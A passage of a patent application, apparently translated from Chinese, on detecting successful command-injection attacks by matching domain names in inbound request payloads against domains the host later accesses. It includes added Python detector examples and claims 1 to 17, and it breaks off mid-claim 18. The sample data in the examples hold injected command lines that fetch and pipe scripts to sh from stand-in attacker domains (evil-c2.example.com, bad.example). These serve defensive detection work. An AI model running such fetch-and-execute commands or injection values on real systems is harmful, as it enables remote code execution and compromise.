Next, the attack detection method provided by the embodiments of this application is introduced with reference to Figures 3 and 4.
Refer to Figure 3, a schematic flowchart of an attack detection method provided by an embodiment of this application. Optionally, the attack detection method shown in Figure 3 is executed by a detection device.
When the method shown in Figure 3 is applied to the scenario of Figure 2a, the detection device is host 101 of Figure 2a; when it is applied to the scenario of Figure 2b, the detection device is comprehensive analysis device 104 of Figure 2b; when it is applied to the scenario of Figure 2c, the detection device is cloud analysis device 105 of Figure 2c.
The method shown in Figure 3 includes steps S101 to S103.
S101: The detection device obtains the network log of the host. The network log includes parameter information of a first request message, where the first request message is a request message that the host received from another device, and the parameter information includes a first domain name contained in the payload part of the first request message.
When the method of Figure 3 is applied to the scenario of Figure 2a, the detection device is integrated into host 101. In this case, S101 is implemented as follows: host 101 obtains its own network log. In one example, host 101 obtains the network log by hooking network functions. In one example, the host uses a hook mechanism to monitor calls to the network data processing functions in the protocol stack function library that handle packets sent and received on the network interface; when such a function is called, the host obtains the first request message that the function is processing. Host 101 then parses the first request message to obtain its payload, and further parses the payload to obtain the first domain name.
The embodiments of this application do not limit how host 101 parses the first request message to obtain the payload, or how it parses the payload to obtain the first domain name. In one example, when the first request message is a TCP request message, host 101 parses the first request message according to the segment format specified in request for comments (RFC) 793 to obtain the payload. Having obtained the payload, host 101 uses a regular expression, following the definition of and constraints on domain names in RFC 1035, to determine whether the payload contains a domain name, and if so, extracts the first domain name contained in the payload.
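The following Python example is added here to illustrate the two parsing steps just described; it is not part of the patent and not the applicant's code. It strips the RFC 793 header from a TCP segment (honouring the data offset so that options are skipped), then scans the payload with a regular expression that approximates the RFC 1035 label rules; the same scanner applies to shell execution records in S102. Obtaining the segment from the hooked network function is outside the example. The segment bytes, the request line, the address 10.0.0.5 and the domain evil-c2.example.com are constructed sample data.

```python
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

# Approximation of the RFC 1035 label rules: labels of 1-63 characters made of
# letters, digits and hyphens, not starting or ending with a hyphen, at least two
# labels, and an alphabetic last label. The alphabetic last label keeps
# dotted-decimal IP addresses such as 10.0.0.5 from being reported as domains.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
DOMAIN_RE = re.compile(rf"\b(?:{_LABEL}\.)+[A-Za-z]{{2,63}}\b")
MAX_NAME_LEN = 253  # RFC 1035 limit on the presentation form of a name


@dataclass
class RequestParams:
    """Parameter information of a request message, as described in S101."""
    recv_time: float        # time the host received the message
    dst_ip: str             # destination IP address of the message
    payload: bytes          # payload part of the message
    domain: Optional[str]   # first domain name found in the payload, if any


def tcp_payload(segment: bytes) -> bytes:
    """Return the payload of a TCP segment laid out as in RFC 793.

    The data offset (upper four bits of byte 12) gives the header length in
    32-bit words, so any options are skipped along with the fixed header.
    """
    if len(segment) < 20:
        raise ValueError("segment shorter than the 20-byte minimum TCP header")
    header_len = (segment[12] >> 4) * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError("invalid TCP data offset")
    return segment[header_len:]


def extract_domains(text: str) -> List[str]:
    """Return the domain names in text (lower-cased, deduplicated, in order)."""
    found: List[str] = []
    for match in DOMAIN_RE.finditer(text):
        name = match.group(0).lower()
        if len(name) <= MAX_NAME_LEN and name not in found:
            found.append(name)
    return found


def build_request_params(segment: bytes, recv_time: float, dst_ip: str) -> RequestParams:
    """Parse one inbound TCP segment into the network-log parameter information."""
    payload = tcp_payload(segment)
    domains = extract_domains(payload.decode("utf-8", errors="replace"))
    return RequestParams(recv_time, dst_ip, payload, domains[0] if domains else None)


def sample_segment() -> bytes:
    """Constructed sample (not captured traffic): a TCP header with a 4-byte MSS
    option (data offset 6) followed by an HTTP request whose query string carries
    a command that fetches from an attacker-controlled domain."""
    header = struct.pack("!HHIIBBHHH", 40000, 8080, 1, 0, 6 << 4, 0x18, 65535, 0, 0)
    options = bytes([0x02, 0x04, 0x05, 0xB4])  # MSS = 1460
    body = (b"GET /api/ping?host=$(curl%20http://evil-c2.example.com/s) HTTP/1.1\r\n"
            b"Host: 10.0.0.5:8080\r\n\r\n")
    return header + options + body


if __name__ == "__main__":
    params = build_request_params(sample_segment(), 1_700_000_000.0, "10.0.0.5")
    print(params.domain)
```

The regular expression deliberately rejects a numeric last label, so the Host header's own address does not become a false "first domain name"; a production agent would additionally handle URL-encoded and IDNA-encoded payloads, which this example does not attempt.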
The embodiments of this application do not limit the other device mentioned above; it may be a network device or a user device, where user devices include but are not limited to terminal devices and servers.
In the embodiments of this application, the parameter information of the first request message refers to content extracted from the first request message, or to information about parameters related to the first request message obtained from the context in which it was received. Besides the first domain name, the parameter information also includes other information. In one example, the parameter information also includes the time at which the host received the first request message. In another example, the parameter information also includes the payload part of the first request message and/or the destination IP address of the first request message.
When the method of Figure 3 is applied to the scenario of Figure 2b or Figure 2c, S101 is implemented as follows: the detection device receives the network log sent by security device 103, which is deployed between the other device and the host; that is, when the other device sends the first request message to host 102, the message is forwarded by security device 103. The security device 103 mentioned here includes but is not limited to firewalls and other devices on which security protection policies are deployed.
In one example, after obtaining the first request message, security device 103 obtains the parameter information of the first request message from it and then sends the parameter information to the detection device.
The way security device 103 obtains the parameter information of the first request message from the first request message is similar to the way host 101 does so; refer to the description above of the host obtaining the parameter information of the first request message, which is not repeated here.
S102: The detection device obtains the host log of the host, where the host log includes at least one domain name accessed by the host.
Optionally, in one example, the detection device obtains the host log of the host for a certain period of time; for example, the detection device obtains the host log for a certain period after the host receives the first request message. The embodiments of this application do not limit this period; to improve the efficiency of attack detection, it is relatively short. For example, the detection device obtains the host log for the 10 seconds after the host receives the first request message.
When the method of Figure 3 is applied to the scenario of Figure 2a, the detection device is integrated into host 101. In this case, S102 is implemented as follows: host 101 obtains its own host log. In one example, host 101 obtains its host log by hooking the shell execution process of the operating system. In one example, host 101 uses a hook mechanism to monitor the shell execution process of the operating system and thereby obtains its shell execution log. Then, following the definition of and constraints on domain names in RFC 1035, it uses a regular expression to determine whether each shell execution log record contains a domain name and, if so, saves that domain name, thereby obtaining a host log that includes at least one domain name accessed by the host.
In the embodiments of this application, the host log includes information related to the host and to the domain names the host accessed. In one example, besides the at least one domain name, the host log also includes a time corresponding to each of the at least one domain name. For a second domain name among the at least one domain name, the time corresponding to the second domain name is the time at which the host accessed the second domain name. In another example, the host log also includes the IP address of the host and/or the log record corresponding to each of the at least one domain name.
When the method of Figure 3 is applied to the scenario of Figure 2b or Figure 2c, S102 is implemented as follows: the detection device receives the host log sent by host 102. In one example, after receiving the first request message, host 102 performs the step of obtaining its host log and then sends the host log to the detection device.
For how host 102 obtains its host log, refer to the description of host 101 obtaining its own host log under S102 above; it is not detailed here.
In addition, the embodiments of this application do not limit the order in which S101 and S102 are executed: S101 may be executed before S102, between S102 and S103, or simultaneously with S102.
S103: If the at least one domain name includes the first domain name, the detection device generates alarm information, where the alarm information indicates that the host has been attacked.
In other words, the alarm information indicates that the attack carried out through the first request message succeeded.
After obtaining the network log and the host log, the detection device matches the first domain name in the network log against the at least one domain name in the host log. If the at least one domain name in the host log includes the first domain name, the host received the first request message containing the first domain name and then accessed the first domain name; in this case the host is considered to have accessed the first domain name as a result of the first request message. The detection device therefore determines that the host has been attacked and generates alarm information indicating this. If the at least one domain name in the host log does not include the first domain name from the network log, the attacker attempted to launch an attack by exploiting the vulnerability but the attack did not succeed, and no alarm is generated.
In one example, after generating the alarm information, the detection device outputs it so that operation and maintenance personnel or another device (for example, a management device) can determine that the host has been attacked and take corresponding measures.
The embodiments of this application do not limit how the detection device outputs the alarm information. In one example, the detection device displays the alarm information on a display screen; in another example, the detection device sends the alarm information to another device, such as a network management device.
In the embodiments of this application, so that the operation and maintenance personnel or the management device learn more about the attack message, the alarm information also includes further information related to the first request message.
As noted above, in one example the parameter information of the first request message in the network log also includes the payload part and/or the destination IP address of the first request message; in that case the alarm information correspondingly includes that payload part and/or that destination IP address. For example, if the parameter information includes the payload part, the alarm information includes the payload part; if the parameter information includes the destination IP address of the first request message, the alarm information includes that destination IP address. In another example, the host log also includes the IP address of the host and/or the log record corresponding to each of the at least one domain name; in that case the alarm information also includes the IP address of the host and/or the log record corresponding to the first domain name from the host log. For example, if the host log includes the IP address of the host, the alarm information includes the IP address of the host; if the host log includes a log record for each of the at least one domain name, the alarm information includes the log record corresponding to the first domain name.
As described above for the network log and the host log, the network log also includes the time at which the host received the first request message, and the host log also includes the time corresponding to each of the at least one domain name. For an attack message, the time at which the host receives the attack message is earlier than the time at which the host accesses the domain name contained in it.
Therefore, to further improve detection accuracy, in one example of S103, besides matching the first domain name against the at least one domain name, the detection device, if the at least one domain name includes the first domain name, further judges whether the time at which the host received the first request message is earlier than the time at which the host accessed the first domain name, that is, whether the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message. If it is, the host first received the first request message and then accessed the first domain name, and the host is confirmed to have been attacked; specifically, the attacker is determined to have attacked the host using the first request message. In this case, the detection device generates the alarm information indicating that the host has been attacked.
In another example, for an attack message there is a time difference between the time at which the host receives the attack message and the time at which the host accesses the domain name in it, and this difference generally falls within a certain range. Accordingly, in one example, after determining that the at least one domain name includes the first domain name and that the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, the detection device further judges whether the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold. When the difference is less than or equal to the preset time threshold, the detection device determines that the host has been attacked, specifically that the attacker attacked the host using the first request message, and generates the alarm information indicating that the host has been attacked.
The embodiments of this application do not limit the preset time threshold. In one example, since the time difference between the host receiving an attack message and the host accessing the domain name in it is generally small, the preset time threshold is a relatively small value, for example 10 seconds. A small threshold also improves the efficiency of detecting attack messages: the sooner an attack message is detected, the sooner measures can be taken. For example, if the preset time threshold were set to a long value such as 5 hours, then after the host receives the first request message, the first domain name would have to be compared against the domain names the host accesses within 5 hours; in other words, in some cases one would wait 5 hours before determining whether the host was attacked.
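The following Python example is added to show the matching of S103 together with the two refinements just described (receipt before access, and a preset time threshold) and the alarm contents described above; it is not part of the patent and not the applicant's code. It assumes the host agent has already extracted the domain name from each shell execution record as described in S102, so host-log entries arrive with a domain, an access time and the raw record. All timestamps, IP addresses, payloads and records are constructed sample data.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class NetLogEntry:
    """Parameter information of the first request message (network log)."""
    recv_time: float   # time the host received the request, epoch seconds
    domain: str        # first domain name found in the request payload
    dst_ip: str        # destination IP address of the request
    payload: str       # payload part, carried into the alarm information


@dataclass(frozen=True)
class HostLogEntry:
    """One domain name the host accessed (host log)."""
    access_time: float  # time the host accessed the domain, epoch seconds
    domain: str
    record: str         # the shell execution record the domain came from


def detect(net: NetLogEntry, host_log: List[HostLogEntry], host_ip: str,
           require_order: bool = True,
           max_delay: Optional[float] = 10.0) -> Optional[Dict[str, object]]:
    """S103 with its two optional refinements.

    Returns the alarm information if a host-log entry matches net.domain, the
    access happened after the request was received (require_order), and the
    gap is at most max_delay seconds (None disables the threshold). Returns
    None when the domain never appears in the host log, so an exploit attempt
    that did not execute raises no alarm.
    """
    wanted = net.domain.lower().rstrip(".")
    for entry in host_log:
        if entry.domain.lower().rstrip(".") != wanted:
            continue
        delay = entry.access_time - net.recv_time
        if require_order and delay < 0:
            continue  # accessed before the request arrived: not caused by it
        if max_delay is not None and abs(delay) > max_delay:
            continue  # too far apart to attribute to this request
        return {
            "alarm": "host attacked: domain from inbound request was accessed",
            "host_ip": host_ip,
            "dst_ip": net.dst_ip,
            "domain": wanted,
            "recv_time": net.recv_time,
            "access_time": entry.access_time,
            "delay_seconds": round(delay, 3),
            "payload": net.payload,
            "host_record": entry.record,
        }
    return None


# Constructed sample data (not from the patent): one inbound request and the
# host-log entries from a short window around its arrival.
T0 = 1_700_000_000.0
SAMPLE_NET = NetLogEntry(
    recv_time=T0,
    domain="evil-c2.example.com",
    dst_ip="10.0.0.5",
    payload="GET /api/ping?host=$(curl%20http://evil-c2.example.com/s) HTTP/1.1",
)
SAMPLE_HOST_LOG = [
    HostLogEntry(T0 - 40.0, "updates.example.org", "apt-get update"),
    HostLogEntry(T0 + 2.3, "evil-c2.example.com",
                 "sh -c 'curl http://evil-c2.example.com/s | sh'"),
    HostLogEntry(T0 + 9.0, "mirror.example.net", "wget https://mirror.example.net/pkg.tgz"),
]


def run_sample() -> Optional[Dict[str, object]]:
    """Correlate the sample request with the sample host log."""
    return detect(SAMPLE_NET, SAMPLE_HOST_LOG, host_ip="10.0.0.5")


if __name__ == "__main__":
    print(run_sample())
```

With the defaults, an access of the same domain 5 seconds before the request arrived, or an hour after it, produces no alarm; passing require_order=False or max_delay=None reverts to the plain domain match of S103.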
As the above description shows, the attack detection method provided by the embodiments of this application determines whether the host has been attacked by combining the first domain name contained in the first request message with the at least one domain name accessed by the host. In an attack scenario in which the attacker intrudes on the host through a vulnerability that allows the attacker to execute system commands directly on the host, the detection mechanism of this solution matches the attacker's attack pattern, so the solution detects attacks against the host accurately.
Moreover, the solution identifies attack messages by combining the network log with the host log; that is, the attack messages it identifies are those whose attack succeeded. The solution therefore does not trigger alarms for attack messages whose attack did not succeed, which reduces false alarms.
Refer to Figure 4, a signaling interaction diagram of an attack detection method provided by an embodiment of this application. The method shown in Figure 4 is applied to an attack detection system that includes a host, a security device and a detection device. In one example, the attack detection system is deployed in the network scenario of Figure 2b, that is, it includes host 102, security device 103 and comprehensive analysis device 104. In another example, the attack detection system is deployed in the network scenario of Figure 2c, that is, it includes host 102, security device 103 and cloud analysis device 105.
The attack detection method shown in Figure 4 includes steps S201 to S204.
S201: The security device sends the network log of the host to the detection device. The network log includes parameter information of a first request message, where the first request message is a message that the host received from another device, and the parameter information includes a first domain name contained in the payload part of the first request message.
S202: The host sends its host log to the detection device, where the host log includes at least one domain name accessed by the host.
S203: The detection device receives the network log sent by the security device and the host log sent by the host.
S204: If the at least one domain name includes the first domain name, the detection device generates alarm information indicating that the host has been attacked.
For the specific implementation of S201 to S204, refer to the description of S101 to S103 above; it is not repeated here.
Based on the attack detection method provided in the above embodiments, embodiments of this application also provide corresponding apparatuses.
Refer to Figure 5, which is a schematic structural diagram of a detection apparatus provided by an embodiment of this application. The detection apparatus is configured to execute the attack detection method provided by the above method embodiments.
The detection apparatus 500 shown in Figure 5 includes an acquisition module 501 and a processing module 502.
In one example, the detection apparatus 500 shown in Figure 5 is applied to a detection device. In this case:
The acquisition module 501 is configured to acquire a network log of a host, where the network log includes parameter information of a first request message, the first request message is a request message that the host received from another device, and the parameter information includes a first domain name contained in the payload part of the first request message. The acquisition module 501 is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host. The processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm information indicates that the host has been attacked.
In a possible implementation, the parameter information further includes the time at which the host received the first request message, and the host log further includes a time corresponding to each of the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, and the at least one domain name includes the second domain name.
In a possible implementation, for the case in which the at least one domain name includes the first domain name, the processing module 502 is configured to generate the alarm information if the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
In a possible implementation, for the case in which the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, the processing module 502 is configured to generate the alarm information if the at least one domain name includes the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold.
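The correlation performed by steps S201 to S204 of the method and by the processing module 502 described above, as an added Python illustration that is not part of the patent and not the applicant's implementation: the log record formats, the domain extraction rule, the sample host IP address and every sample log entry below are constructed assumptions. The three modes of `detect` mirror the three variants in the text: a plain domain match, the match with the host's access time later than the receipt time of the request, and the match additionally bounded by the preset time threshold.

```python
"""Correlate a host's network log with its host log: raise an alarm when a domain
carried in the payload of a request the host received later appears as a domain
the host itself accessed.

Added illustration, not the patent's implementation. Log formats, the domain
extraction rule, HOST_IP and all sample entries are constructed assumptions.
"""
from dataclasses import dataclass
from datetime import datetime
import re
from typing import Dict, List, Optional

HOST_IP = "10.0.0.5"  # constructed sample host address (RFC 1918), not from the patent

TOKEN_SPLIT = re.compile(r"[\s;|&'\"=,<>()]+")            # shell / HTTP-parameter delimiters
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # "http://", "ftp://", ...
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)


@dataclass
class NetLogEntry:
    """Parameter information of one request message received by the host."""
    recv_time: datetime  # time at which the host received the request
    dst_ip: str          # destination IP address of the request
    payload: str         # payload part of the request


@dataclass
class HostLogEntry:
    """One domain the host accessed, with the access time and the supporting log record."""
    time: datetime
    domain: str
    record: str          # e.g. the shell command line observed by the hook


@dataclass
class Alert:
    """Alarm information: the host, the matched domain and the evidence on both sides."""
    host_ip: str
    domain: str
    recv_time: datetime
    access_time: datetime
    payload: str
    dst_ip: str
    host_record: str


def extract_domains(payload: str) -> List[str]:
    """Domain names carried in a request payload, lower-cased, in order of first
    appearance. A URL scheme is stripped and the path/port/query part dropped."""
    found: List[str] = []
    for tok in TOKEN_SPLIT.split(payload):
        tok = SCHEME.sub("", tok)
        tok = re.split(r"[/:?#]", tok, maxsplit=1)[0].lower()
        if DOMAIN.match(tok) and tok not in found:
            found.append(tok)
    return found


def detect(host_ip: str, net_log: List[NetLogEntry], host_log: List[HostLogEntry],
           require_later: bool = True, threshold_seconds: Optional[float] = None) -> List[Alert]:
    """One Alert per (request, host access) pair whose domain matches.

    require_later=False    plain match (first variant)
    require_later=True     host access must be later than receipt of the request (second)
    threshold_seconds set  access time minus receipt time must also be <= threshold (third;
                           this implies require_later, as in the text)
    """
    if threshold_seconds is not None:
        require_later = True
    by_domain: Dict[str, List[HostLogEntry]] = {}
    for h in host_log:
        by_domain.setdefault(h.domain.lower(), []).append(h)

    alerts: List[Alert] = []
    for n in net_log:
        for dom in extract_domains(n.payload):
            for h in by_domain.get(dom, []):
                delta = (h.time - n.recv_time).total_seconds()
                if require_later and delta <= 0:
                    continue
                if threshold_seconds is not None and delta > threshold_seconds:
                    continue
                alerts.append(Alert(host_ip, dom, n.recv_time, h.time,
                                    n.payload, n.dst_ip, h.record))
    return alerts


def sample_logs():
    """Constructed sample logs (not from the patent)."""
    t = datetime.fromisoformat
    net_log = [
        # request whose payload names a domain the host fetches 3 s later
        NetLogEntry(t("2024-01-01T10:00:00"), HOST_IP, "q=1;curl http://bad.example/x.sh|sh"),
        # request naming a domain the host had already accessed earlier (benign ordering)
        NetLogEntry(t("2024-01-01T10:05:00"), HOST_IP, "search=repo.example docs"),
        # request carrying no domain at all
        NetLogEntry(t("2024-01-01T11:00:00"), HOST_IP, "name=bob"),
    ]
    host_log = [
        HostLogEntry(t("2024-01-01T09:59:00"), "repo.example", "git fetch https://repo.example/t.git"),
        HostLogEntry(t("2024-01-01T10:00:03"), "bad.example", "curl http://bad.example/x.sh"),
        HostLogEntry(t("2024-01-01T12:00:00"), "bad.example", "curl http://bad.example/beacon"),
    ]
    return net_log, host_log


def run_sample() -> Dict[str, int]:
    """Alert counts the sample logs yield under each of the three variants."""
    net_log, host_log = sample_logs()
    return {
        "match": len(detect(HOST_IP, net_log, host_log, require_later=False)),
        "later": len(detect(HOST_IP, net_log, host_log)),
        "window": len(detect(HOST_IP, net_log, host_log, threshold_seconds=60)),
    }


if __name__ == "__main__":
    net, hosts = sample_logs()
    for a in detect(HOST_IP, net, hosts, threshold_seconds=60):
        print(f"ALERT host={a.host_ip} domain={a.domain} recv={a.recv_time} "
              f"access={a.access_time} payload={a.payload!r} record={a.host_record!r}")
    print(run_sample())
```

On the sample data the plain match yields three alerts, requiring the access to be later than the receipt drops the `repo.example` case (accessed before the request arrived), and the 60-second window additionally drops the access two hours later, leaving the single pairing the patent text is aimed at. The alarm carries the payload, destination IP, host IP and host log record, matching the optional alarm contents described for the parameter information and the host log.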
In a possible implementation, the detection device is integrated into the host, and the acquisition module 501 is configured to acquire the network log of the host by hooking a network function, and to acquire the host log of the host by hooking the shell execution process in the operating system.
In a possible implementation, the detection device is another independent computer device that has a network connection to the host, and the acquisition module 501 is configured to receive the network log sent by a security device, where the security device is deployed between the other device and the host, and to receive the host log sent by the host.
In a possible implementation, the detection device, the security device and the host are located in the same local area network.
In a possible implementation, the detection device is deployed in the Internet.
In a possible implementation, the processing module 502 is further configured to output the alarm information.
In a possible implementation, the parameter information further includes the payload part and/or the destination Internet Protocol (IP) address of the first request message, and the alarm information further includes the payload part and/or the destination IP address of the first request message contained in the parameter information.
In a possible implementation, the host log further includes the IP address of the host and/or a log record corresponding to each of the at least one domain name, and the alarm information further includes the IP address of the host and/or the log record corresponding to the first domain name contained in the host log.
In another example, the detection apparatus 500 shown in Figure 5 is integrated into the host. In this case:
The acquisition module 501 is configured to acquire the network log of the host, where the network log includes parameter information of a first request message, the first request message is a request message that the host received from another device, and the parameter information includes a first domain name contained in the payload part of the first request message. The acquisition module 501 is further configured to acquire the host log of the host, where the host log includes at least one domain name accessed by the host. The processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm information indicates that the host has been attacked.
In a possible implementation, the acquisition module 501 is configured to acquire the network log of the host by hooking a network function, and to acquire the host log of the host by hooking the shell execution process in the operating system.
Since the detection apparatus 500 corresponds to the attack detection method provided by the above method embodiments, the specific implementation of each unit of the apparatus 500 follows the same concept as the above method embodiments. For the specific implementation of each unit of the apparatus 500, refer to the description of the above method embodiments; it is not repeated here.
It should be noted that the hardware structure of the aforementioned detection apparatus 500 may be as shown in Figure 6, which is a schematic structural diagram of a device provided by an embodiment of this application.
Referring to Figure 6, the device 600 includes a processor 610, a communication interface 620 and a memory 630. The device 600 may have one or more processors 610; Figure 6 takes one processor as an example. In this embodiment of the application, the processor 610, the communication interface 620 and the memory 630 may be connected through a bus system or in other ways; Figure 6 takes connection through the bus system 640 as an example.
The processor 610 may be a central processing unit (CPU), a network processor (NP), or a combination of a CPU and an NP. The processor 610 may further include a hardware chip. The hardware chip may be an application-specific integrated circuit (ASIC), a programmable logic device (PLD) or a combination thereof. The PLD may be a complex programmable logic device (CPLD), a field-programmable gate array (FPGA), generic array logic (GAL) or any combination thereof.
The memory 630 may include volatile memory, for example random-access memory (RAM); the memory 630 may also include non-volatile memory, for example flash memory, a hard disk drive (HDD) or a solid-state drive (SSD); the memory 630 may also include a combination of the above types of memory. The memory 630 can, for example, store the network log of the host and the host log of the host.
Optionally, the memory 630 stores an operating system and programs, executable modules or data structures, or a subset or extended set thereof, where the programs may include various operating instructions for implementing various operations. The operating system may include various system programs for implementing various basic services and handling hardware-based tasks. The processor 610 can read the programs in the memory 630 to implement the attack detection method provided by the embodiments of this application.
The bus system 640 may be a peripheral component interconnect (PCI) bus or an extended industry standard architecture (EISA) bus, among others. The bus system 640 may be divided into an address bus, a data bus, a control bus and so on. For ease of presentation, only one thick line is used in Figure 6, but this does not mean that there is only one bus or one type of bus.
An embodiment of this application further provides a computer-readable storage medium including instructions or a computer program which, when run on a computer, cause the computer to execute the attack detection method provided by the above embodiments.
An embodiment of this application further provides a computer program product including instructions or a computer program which, when run on a computer, cause the computer to execute the attack detection method provided by the above embodiments.
The terms "first", "second", "third", "fourth" and so on (if present) in the description, claims and drawings of this application are used to distinguish similar objects and are not necessarily used to describe a particular order or sequence. It should be understood that data so used are interchangeable where appropriate, so that the embodiments described here can be implemented in an order other than that illustrated or described here. In addition, the terms "including" and "having" and any variations thereof are intended to cover non-exclusive inclusion; for example, a process, method, system, product or device that includes a series of steps or units need not be limited to the steps or units explicitly listed, but may include other steps or units that are not explicitly listed or that are inherent to the process, method, product or device.
Those skilled in the art can clearly understand that, for convenience and brevity of description, reference may be made to the corresponding processes in the foregoing method embodiments for the specific working processes of the systems, apparatuses and units described above; they are not repeated here.
In the several embodiments provided in this application, it should be understood that the disclosed systems, apparatuses and methods may be implemented in other ways. For example, the apparatus embodiments described above are merely illustrative; the division of units is only one logical service division, and there may be other ways of division in actual implementation, for example multiple units or components may be combined or integrated into another system, or some features may be omitted or not executed. In addition, the mutual coupling, direct coupling or communication connection shown or discussed may be an indirect coupling or communication connection through some interfaces, apparatuses or units, and may be electrical, mechanical or in other forms.
Units described as separate components may or may not be physically separate, and components shown as units may or may not be physical units; that is, they may be located in one place or distributed over multiple network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, the service units in the embodiments of this application may be integrated into one processing unit, or each unit may exist physically alone, or two or more units may be integrated into one unit. The integrated unit may be implemented in the form of hardware or in the form of a software service unit.
If the integrated unit is implemented in the form of a software service unit and sold or used as an independent product, it may be stored in a computer-readable storage medium. Based on this understanding, the technical solution of this application in essence, or the part that contributes to the prior art, or all or part of the technical solution, may be embodied in the form of a software product. The computer software product is stored in a storage medium and includes several instructions for causing a computer device (which may be a personal computer, a server, a network device or the like) to execute all or some of the steps of the methods of the embodiments of this application. The aforementioned storage medium includes a USB flash drive, a removable hard disk, a read-only memory (ROM), a random access memory (RAM), a magnetic disk, an optical disc or any other medium that can store program code.
Those skilled in the art should be aware that, in one or more of the above examples, the services described in the present invention may be implemented in hardware, software, firmware or any combination thereof. When implemented in software, these services may be stored in a computer-readable medium or transmitted as one or more instructions or code on a computer-readable medium. Computer-readable media include computer storage media and communication media, where communication media include any medium that facilitates transfer of a computer program from one place to another. A storage medium may be any available medium that can be accessed by a general-purpose or special-purpose computer.
The above specific embodiments further describe the objectives, technical solutions and beneficial effects of the present invention in detail. It should be understood that the above are merely specific embodiments of the present invention.
The above embodiments are only used to illustrate the technical solutions of this application and not to limit them. Although this application has been described in detail with reference to the foregoing embodiments, those of ordinary skill in the art should understand that they may still modify the technical solutions described in the foregoing embodiments or make equivalent replacements of some of the technical features, and that such modifications or replacements do not cause the essence of the corresponding technical solutions to depart from the scope of the technical solutions of the embodiments of this application.

Claims (29)

  1. A method for detecting attacks, characterized in that it is applied to a detection device and comprises:
    acquiring a network log of a host, wherein the network log comprises parameter information of a first request message, the first request message is a request message that the host received from another device, and the parameter information comprises a first domain name contained in the payload part of the first request message;
    acquiring a host log of the host, wherein the host log comprises at least one domain name accessed by the host;
    if the at least one domain name comprises the first domain name, generating alarm information, wherein the alarm information indicates that the host has been attacked.
  2. The method according to claim 1, characterized in that the parameter information further comprises the time at which the host received the first request message, and the host log further comprises a time corresponding to each of the at least one domain name, wherein the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, and the at least one domain name comprises the second domain name.
  3. The method according to claim 2, characterized in that generating alarm information if the at least one domain name comprises the first domain name comprises:
    generating the alarm information if the at least one domain name comprises the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
  4. The method according to claim 3, characterized in that generating the alarm information if the at least one domain name comprises the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message comprises:
    generating the alarm information if the at least one domain name comprises the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold.
  5. The method according to any one of claims 1 to 4, characterized in that the detection device is integrated into the host, and acquiring the network log of the host comprises:
    acquiring the network log of the host by hooking a network function;
    and acquiring the host log of the host comprises:
    acquiring the host log of the host by hooking the shell execution process in the operating system.
  6. The method according to any one of claims 1 to 4, characterized in that the detection device is another independent computer device that has a network connection to the host, and acquiring the network log of the host comprises:
    receiving the network log sent by a security device, wherein the security device is deployed between the other device and the host;
    and acquiring the host log of the host comprises:
    receiving the host log sent by the host.
  7. The method according to claim 6, characterized in that the detection device, the security device and the host are located in the same local area network.
  8. The method according to claim 6, characterized in that the detection device is deployed in the Internet.
  9. The method according to claim 1, characterized in that the parameter information further comprises the payload part and/or the destination Internet Protocol (IP) address of the first request message, and the alarm information further comprises the payload part and/or the destination IP address of the first request message contained in the parameter information.
  10. The method according to claim 1 or 9, characterized in that the host log further comprises the IP address of the host and/or a log record corresponding to each of the at least one domain name, and the alarm information further comprises the IP address of the host and/or the log record corresponding to the first domain name contained in the host log.
  11. A system for detecting attacks, characterized in that the system comprises a security device, a host and a detection device;
    the security device is configured to send a network log of the host to the detection device, wherein the network log comprises parameter information of a first request message, the first request message is a message that the host received from another device, and the parameter information comprises a first domain name contained in the payload part of the first request message;
    the host is configured to send a host log of the host to the detection device, wherein the host log comprises at least one domain name accessed by the host;
    the detection device is configured to receive the network log sent by the security device and the host log sent by the host, and to generate alarm information if the at least one domain name comprises the first domain name, wherein the alarm information indicates that the host has been attacked.
  12. The system according to claim 11, characterized in that the parameter information further comprises the time at which the host received the first request message, and the host log further comprises a time corresponding to each of the at least one domain name, wherein the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, and the at least one domain name comprises the second domain name.
  13. The system according to claim 12, characterized in that the detection device is configured to:
    generate the alarm information if the at least one domain name comprises the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
  14. The system according to claim 13, characterized in that the detection device is configured to:
    generate the alarm information if the at least one domain name comprises the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold.
  15. The system according to any one of claims 11 to 14, characterized in that the host acquires the host log of the host by hooking the shell execution process in the operating system.
  16. The system according to any one of claims 11 to 15, characterized in that the detection device, the security device and the host are located in the same local area network.
  17. The system according to any one of claims 11 to 15, characterized in that the detection device is deployed in the Internet.
  18. 一种检测装置,其特征在于,所述检测装置集成于主机中,所述检测装置包括:A detection device, characterized in that the detection device is integrated in the host machine, and the detection device includes:
